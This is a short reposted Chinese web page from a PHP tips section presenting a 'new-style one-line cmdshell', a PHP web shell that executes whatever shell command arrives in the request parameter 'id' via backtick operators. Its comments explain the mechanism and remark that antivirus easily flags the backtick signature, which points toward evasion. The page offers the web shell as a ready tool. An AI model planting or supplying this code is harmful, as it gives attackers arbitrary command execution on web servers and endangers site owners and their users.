页面导航：首页 → 网络编程 → PHP编程 → php技巧 → 正文内容 php cmdshell

php一句话cmdshell新型 (非一句话木马)

发布：dxy 字体：[增加减小] 类型：转载

php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)；

复制代码代码如下:

<?php 
/*一个新型的php一句话cmdshell(非一句话木马) 
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)； 
//局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；``里面不能执行php代码； 
//write by skyfire 
*/ 
echo `$_REQUEST[id]`; 
?>